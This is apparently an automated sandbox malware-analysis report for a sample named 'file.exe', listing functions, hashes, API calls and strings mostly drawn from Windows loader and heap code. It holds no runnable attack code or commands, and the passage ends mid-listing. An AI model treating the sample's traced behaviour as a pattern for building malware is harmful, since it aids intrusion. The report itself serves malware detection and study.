Opcode Fuzzy Hash: 9eb86ef218b5534fce48d0159bfcfce2caed37fe6a86c3f413d95aa999c7f806
Instruction Fuzzy Hash: 1D3154B1D01628CBEB68CF6BC95978AFAF6BF89304F14C1A9C40CA7254DB740A85CF51

Function 069DA7B8 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133358737.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69d0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cc8d4562732b9aaf1828585e7578c7d0104949c5dada39faf9d2e1811328433
Instruction ID: 8a2441a57fde4ca4cbd1dc12273ac896cd4e8f6553caf24b6a9e532bccbabb98
Opcode Fuzzy Hash: 8cc8d4562732b9aaf1828585e7578c7d0104949c5dada39faf9d2e1811328433
Instruction Fuzzy Hash: 6C31D7B1E056188FEB58CF6BC8442DABBF7ABC9300F14C0BAD909A7619DB305D858F50

Function 069DA7A8 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133358737.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69d0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aedd52c8da7f13921223d53cf048281e82ec079934cba6d02e3bf320c93a5136
Instruction ID: f45af64075e9ce8886d6efeb54b360f2aa43fac818875942843e7c0d706c5283
Opcode Fuzzy Hash: aedd52c8da7f13921223d53cf048281e82ec079934cba6d02e3bf320c93a5136
Instruction Fuzzy Hash: D321CCB1E056589BEB59CF6BCC006DAFAF7AFC9310F14C4BAD848AB215DB7009858F51

Function 06CA7180 Relevance: 7.7, Strings: 6, Instructions: 152COMMON

Download Yara Rule

Strings

(nq, xrefs: 06CA734A
pnq, xrefs: 06CA72D7
4'jq, xrefs: 06CA7204
4'jq, xrefs: 06CA7252
4'jq, xrefs: 06CA72CA
4'jq, xrefs: 06CA7234

Memory Dump Source

Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca0000_file.jbxd

Similarity

API ID:
String ID: (nq$4'jq$4'jq$4'jq$4'jq$pnq
API String ID: 0-2343140522
Opcode ID: e9a8f4b1d6a8ef9ae9c0f989f2b984649f5e7af2ff2f267fa89fe93352ccec52
Instruction ID: 91e2e25084a8ff86f33f905dd66a5d3d36df7bb730a0ded7eeb2fe28dfa4b772
Opcode Fuzzy Hash: e9a8f4b1d6a8ef9ae9c0f989f2b984649f5e7af2ff2f267fa89fe93352ccec52
Instruction Fuzzy Hash: 2951A370A403058FC748DF698950AAFBBEBFFC8300F14496CD44A976A9DE789906C7A1

Analysis Process: file.exePID: 528, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	0.8%
Dynamic/Decrypted Code Coverage:	5.1%
Signature Coverage:	4.1%
Total number of Nodes:	98
Total number of Limit Nodes:	8

Executed Functions

Function 00417983 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004179F5

Memory Dump Source

Source File: 00000002.00000002.2216787886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 919664c6ec93289ae22f137e9bf50d951b2176283fe432a251c119e73e98b3ef
Instruction ID: 2272e45357e1b8a5eef0063927663549135e1288739789d900d719aea6b3099d
Opcode Fuzzy Hash: 919664c6ec93289ae22f137e9bf50d951b2176283fe432a251c119e73e98b3ef
Instruction Fuzzy Hash: C00112B5E0020DABDB10DAA5DC42FDEB778AB54308F4081A6E90897240F675EB588795

Function 0042C7A3 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C7D7

Memory Dump Source

Source File: 00000002.00000002.2216787886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 36e5aa6e06a6865421a501a8efbc971ace10677f283fac51b5c3a6700c8166c7
Instruction ID: c068b07e7c5f5f25d136ae17d6bddc0cdf0b8edc256bca3c504a9b7e04cf088e
Opcode Fuzzy Hash: 36e5aa6e06a6865421a501a8efbc971ace10677f283fac51b5c3a6700c8166c7
Instruction Fuzzy Hash: 11E046762042147BE620AA6ADC41F9B776CEFC5714F00842AFA08A7241CA76B91187F8

Function 01692DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01692DFA

Memory Dump Source

Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8dd68a9e39134abd33ab31852eeb5a0f144e06eb4c16f7512475d778b7902560
Instruction ID: 21782efff9a5183e87e5f056ab0087e052e6e5fd5f6bedf6b81b7efc031ce11d
Opcode Fuzzy Hash: 8dd68a9e39134abd33ab31852eeb5a0f144e06eb4c16f7512475d778b7902560
Instruction Fuzzy Hash: 7590027170140413D11175984914707000D97D0242FD5C412A5424658ED6569E52A621

Function 01692C70 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01692C7A

Memory Dump Source

Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 43b2a0559a1f6807a596841c753d872f1d57ddd85b8fd5661f5b039dba9459bd
Instruction ID: 8d0f988ae4a04fa16ed1e43cf415b136ce9e09d5875d63d5051eaa700a1fa74a
Opcode Fuzzy Hash: 43b2a0559a1f6807a596841c753d872f1d57ddd85b8fd5661f5b039dba9459bd
Instruction Fuzzy Hash: D990027170148802D1107598881474B000997D0302F99C411A9424758EC6959D917621

Function 016935C0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 016935CA

Memory Dump Source

Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1c45e03ae6aaaf880426e440f477eb848f75d75fb9b2db9cf201bdd3a296fce4
Instruction ID: 26a2ef05ec1ab60b96ad5a761f4093c9d1582f48c4240a6bffea95fce522a3bc
Opcode Fuzzy Hash: 1c45e03ae6aaaf880426e440f477eb848f75d75fb9b2db9cf201bdd3a296fce4
Instruction Fuzzy Hash: 6B900271B0550402D10075984924707100997D0202FA5C411A5424668EC7959E516AA2

Function 0042CB23 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CB5F

Strings

1gA, xrefs: 0042CB26

Memory Dump Source

Source File: 00000002.00000002.2216787886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: 1gA
API String ID: 3298025750-4052736723
Opcode ID: 0b9c64c89bd8e8e46414c8097e5b75ef52ce40fc719733ff23b7b54767d60661
Instruction ID: 3db9d38b6c099dfd2cf4dce0f204b55713b22ea5661551a61eb9de621a3d7ce5
Opcode Fuzzy Hash: 0b9c64c89bd8e8e46414c8097e5b75ef52ce40fc719733ff23b7b54767d60661
Instruction Fuzzy Hash: CFE09276208604BBD610EE99DC45FDB37ADEFC9714F004419FA08A7241D671B91187B4

Function 0042CAD3 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,0041E73B,?,?,00000000,?,0041E73B,?,?,?), ref: 0042CB0F

Memory Dump Source

Source File: 00000002.00000002.2216787886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5f4595f409b0a238fc68096f1e2163fd5f9118da07220293d69c765325efb063
Instruction ID: 1cc8bddffe364a191cc507c297a67581dd259309c4f7cb3357891730a1f7528c
Opcode Fuzzy Hash: 5f4595f409b0a238fc68096f1e2163fd5f9118da07220293d69c765325efb063
Instruction Fuzzy Hash: EDE092B6608244BBD610EFA9EC41FDB33ACEFC5714F004419F908A7241CA71B9118BB4

Function 0042CB73 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?), ref: 0042CBAA

Memory Dump Source

Source File: 00000002.00000002.2216787886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: d8368835974c325c49e4badbc378e576f0341e2ec1d321e659ceb712fa60f3df
Instruction ID: b8e24616ca6c070d3f9d53c64f91f6f12713fa84a05849ca7b521decef18237f
Opcode Fuzzy Hash: d8368835974c325c49e4badbc378e576f0341e2ec1d321e659ceb712fa60f3df
Instruction Fuzzy Hash: E2E046362043547BD220BA5ADC02F9BB7ACDFC5714F00442AFA08A7241CBB2B91087B4

Function 01692C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01692C24

Memory Dump Source

Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1fecf91d95bdea74809298139f2ccc010d16728cb6e12103d2c5f77acef9bd9a
Instruction ID: 1d4f156f512dbaf36d63852b2ed5a9ed286778f262b69b7b6014033439b5aa18
Opcode Fuzzy Hash: 1fecf91d95bdea74809298139f2ccc010d16728cb6e12103d2c5f77acef9bd9a
Instruction Fuzzy Hash: 69B09B71D015C5D6DF51E7A44E18717790477D0701F55C065D3030751F4738D5D1E675

Non-executed Functions

Function 016D2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

DisableExceptionChainValidation, xrefs: 016D275F
TracingFlags, xrefs: 016D2549
CFGOptions, xrefs: 016D2967
minkernel\ntdll\ldrinit.c, xrefs: 016D3187
ShutdownFlags, xrefs: 016D24A1
RaiseExceptionOnPossibleDeadlock, xrefs: 016D2579
FrontEndHeapDebugOptions, xrefs: 016D2489
MaxDeadActivationContexts, xrefs: 016D2D82
UnloadEventTraceDepth, xrefs: 016D24C0
@, xrefs: 016D2B74
ExecuteOptions, xrefs: 016D25A0
GlobalFlag2, xrefs: 016D2FC0
UseImpersonatedDeviceMap, xrefs: 016D251C
MaxLoaderThreads, xrefs: 016D24EC
DisableHeapLookaside, xrefs: 016D246D
MinimumStackCommitInBytes, xrefs: 016D2BB0
LdrpInitializeExecutionOptions, xrefs: 016D317D
@, xrefs: 016D2942
Initializing the application verifier package failed with status 0x%08lx, xrefs: 016D3176
GlobalFlag, xrefs: 016D2F3F, 016D3059

Memory Dump Source

Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: b91b5d2f12ff7ac45ffe0eeb731ef9c0ba298c31be9156fecfb9f48eca8c51c4
Instruction ID: 1b774c22810c1a7708b32c0930496828e6613057ec0fed48e3ce2c409948c5df
Opcode Fuzzy Hash: b91b5d2f12ff7ac45ffe0eeb731ef9c0ba298c31be9156fecfb9f48eca8c51c4
Instruction Fuzzy Hash: 15928BB1A08342ABE721CF29CC90B6BB7E9BB84754F04492DFA95D7350D770E844CB96

Function 01688620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016C54CE
Critical section address, xrefs: 016C5425, 016C54BC, 016C5534
Thread is in a state in which it cannot own a critical section, xrefs: 016C5543
Thread identifier, xrefs: 016C553A
corrupted critical section, xrefs: 016C54C2
double initialized or corrupted critical section, xrefs: 016C5508
Invalid debug info address of this critical section, xrefs: 016C54B6
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016C540A, 016C5496, 016C5519
Address of the debug info found in the active list., xrefs: 016C54AE, 016C54FA
8, xrefs: 016C52E3
Critical section address., xrefs: 016C5502
undeleted critical section in freed memory, xrefs: 016C542B
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016C54E2
Critical section debug info address, xrefs: 016C541F, 016C552E

Memory Dump Source

Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: 875e521972aaa88726621fb153a7d3883d091584d18c6da440fed69614e3b612
Instruction ID: 0df7e39340a9b763c32a5ab1d19719982279f6b567f3d8205a1057a5c439bc84
Opcode Fuzzy Hash: 875e521972aaa88726621fb153a7d3883d091584d18c6da440fed69614e3b612
Instruction Fuzzy Hash: 81819AB1A41358AFEB20CF99CC45BAEBBB9EB48B14F10421EF50AB7241D375A941CB50

Function 016829F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON

Download Yara Rule

Strings

SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 016C2624
SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 016C2412
SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 016C2498
SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 016C24C0
@, xrefs: 016C259B
SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 016C2602
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 016C25EB
SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 016C2409
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 016C2506
SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 016C22E4
RtlpResolveAssemblyStorageMapEntry, xrefs: 016C261F

Memory Dump Source

Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID:
String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 0-4009184096
Opcode ID: e70a3a344b885ee09a0b3b263e045912fe93cc5b7cf420bbe1ae9dac84f9eeb6
Instruction ID: 5ea17f9b9e9ce871c4fc392cfc1dbba39037b16ed337f2a5b3993a0da40dfdd4
Opcode Fuzzy Hash: e70a3a344b885ee09a0b3b263e045912fe93cc5b7cf420bbe1ae9dac84f9eeb6
Instruction Fuzzy Hash: FC0270F1D012299FDB71DB54CC90BAAB7B8AF54704F0041EEEA09A7241DB709E85CF69

Function 016F8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON

Download Yara Rule

Strings

csrss.exe, xrefs: 016F8B80
lsass.exe, xrefs: 016F8BA1
SegmentHeap, xrefs: 016F8BE9
DefaultBrowser_NOPUBLISHERID, xrefs: 016F8D00
svchost.exe, xrefs: 016F8B68
services.exe, xrefs: 016F8B96
http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 016F8BD0
smss.exe, xrefs: 016F8B8B
heapType, xrefs: 016F8BCB
runtimebroker.exe, xrefs: 016F8B73

Memory Dump Source

Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: fe5dd515408af625955100d31a261ac6c7bbc63627fc90f9f856ffe0ebaa211f
Instruction ID: 7c69ec7bfb97f42b1e67f1705bd42e2692245eafaf910d5048e8a4df78f5bcab
Opcode Fuzzy Hash: fe5dd515408af625955100d31a261ac6c7bbc63627fc90f9f856ffe0ebaa211f
Instruction Fuzzy Hash: 8651ED716057129BD329CF198C44BABBBECEFA4340F14496DEA9983281E770D608CB92

Function 01700274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

RtlReAllocateHeap, xrefs: 017002BF, 01700362
HEAP[%wZ]: , xrefs: 01700399, 017004A8, 017005D0, 01700675, 017006CC
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 017006EA
Just reallocated block at %p to %Ix bytes, xrefs: 017005F1
HEAP: , xrefs: 017003A6, 017004B5, 017005DD, 01700682, 017006D9
About to reallocate block at %p to %Ix bytes, xrefs: 017003BA
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 017004D3
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 0170069F

Memory Dump Source

Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: cafbec5b0cb32b6be26b70d113389475367e25caa84caaf9f9c0541a5fd733cc
Instruction ID: 6061d1d510a182db6792af488ac2ca3f853038dcaed4d533c18e7fd1c95a20a7
Opcode Fuzzy Hash: cafbec5b0cb32b6be26b70d113389475367e25caa84caaf9f9c0541a5fd733cc
Instruction Fuzzy Hash: 0ED19A35500785EFDB22DFA8C840BAAFBF2FF4A764F188059F4469B292C7759981CB14

Function 016D89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

HandleTraces, xrefs: 016D8C8F
VerifierDebug, xrefs: 016D8CA5
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 016D8A67
AVRF: -*- final list of providers -*- , xrefs: 016D8B8F
VerifierFlags, xrefs: 016D8C50
AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 016D8A3D
VerifierDlls, xrefs: 016D8CBD

Memory Dump Source

Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: 15066f160a43521f0ce648c9e67a33b327af2f37a68ca3c3a265fa7defadd4f4
Instruction ID: c8cc642730ad17ca300420210db270a74d7f491a61183b884d2f8c93ea10e235
Opcode Fuzzy Hash: 15066f160a43521f0ce648c9e67a33b327af2f37a68ca3c3a265fa7defadd4f4
Instruction Fuzzy Hash: 979145B2E49712EFD721EF68CC84B1BBBA9AB95724F05445DFA416B281C730DC01CB99

Function 016863FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 016C41FE
Process initialization failed with status 0x%08lx, xrefs: 016C413A
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 016C40D8
_LdrpInitialize, xrefs: 016C40DF, 016C4141, 016C4205, 016C425F
minkernel\ntdll\ldrinit.c, xrefs: 016C40E9, 016C414B, 016C420F, 016C4269
Delaying execution failed with status 0x%08lx, xrefs: 016C4258

Memory Dump Source

Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 091636d0562581445c16869955c539682d9b6433aece02cc07f5a4731b5ef0ec
Instruction ID: 5073e71abf319c92f870c2781713167de5f5c14ad91af4a0c18bc02b6c8d4cee
Opcode Fuzzy Hash: 091636d0562581445c16869955c539682d9b6433aece02cc07f5a4731b5ef0ec
Instruction Fuzzy Hash: 57914670B013159BEB25EF58DCA5BBE7BA2FF40B24F00812DE9456B781DB749841CB94

Function 0164645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

Getting the shim engine exports failed with status 0x%08lx, xrefs: 016A9A01
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 016A99ED
apphelp.dll, xrefs: 01646496
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 016A9A2A
minkernel\ntdll\ldrinit.c, xrefs: 016A9A11, 016A9A3A
LdrpInitShimEngine, xrefs: 016A99F4, 016A9A07, 016A9A30

Memory Dump Source

Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID:
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: 72a2fdd0bc281998839ec8bcf5fc765b891fb4aeb9bed7d8365b6327d852fbf7
Instruction ID: b484f71fb577e0511de6c1714abf1cbae2878195e636efa391bd95dd75763baa
Opcode Fuzzy Hash: 72a2fdd0bc281998839ec8bcf5fc765b891fb4aeb9bed7d8365b6327d852fbf7
Instruction Fuzzy Hash: FE51E1712083009FD724DF24DC91A6B77E9FB84758F50491EFA8A97260DB30ED05CB96

Function 01682674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: %s() passed the empty activation context, xrefs: 016C2165
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 016C21BF
RtlGetAssemblyStorageRoot, xrefs: 016C2160, 016C219A, 016C21BA
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 016C219F
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 016C2178
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 016C2180

Memory Dump Source

Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: 33ed0f710d905954fc1f0472d21f921a5b06c39de2d0ce109b87cf1edca1f7cd
Instruction ID: fb8095a9a746026c86cfe91e8e364b3458768e7a155ae7aee28b143ab5c9879d
Opcode Fuzzy Hash: 33ed0f710d905954fc1f0472d21f921a5b06c39de2d0ce109b87cf1edca1f7cd
Instruction Fuzzy Hash: 2F31597AF4021577E721AA9A8C51F7B7A69DBE5E40F05416DFF02A7200D3709A01C2A0

Function 0168C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

LdrpInitializeImportRedirection, xrefs: 016C8177, 016C81EB
Unable to build import redirection Table, Status = 0x%x, xrefs: 016C81E5
minkernel\ntdll\ldrinit.c, xrefs: 0168C6C3
minkernel\ntdll\ldrredirect.c, xrefs: 016C8181, 016C81F5
Loading import redirection DLL: '%wZ', xrefs: 016C8170
LdrpInitializeProcess, xrefs: 0168C6C4

Memory Dump Source

Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: 33dce6764d4c46a0c64a80742e3b4dbd724546a98cb689645610fb92496d44a1
Instruction ID: 265fb5ffa78eb03372b5e4243a1bd29f241e1f59ed978b726c9160d7c7d6c7c8
Opcode Fuzzy Hash: 33dce6764d4c46a0c64a80742e3b4dbd724546a98cb689645610fb92496d44a1
Instruction Fuzzy Hash: 483104716443529FC220EB28DD45E2A7BE6EF94B24F04466CF9856B391E720EC04C7A6

Function 0169096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON

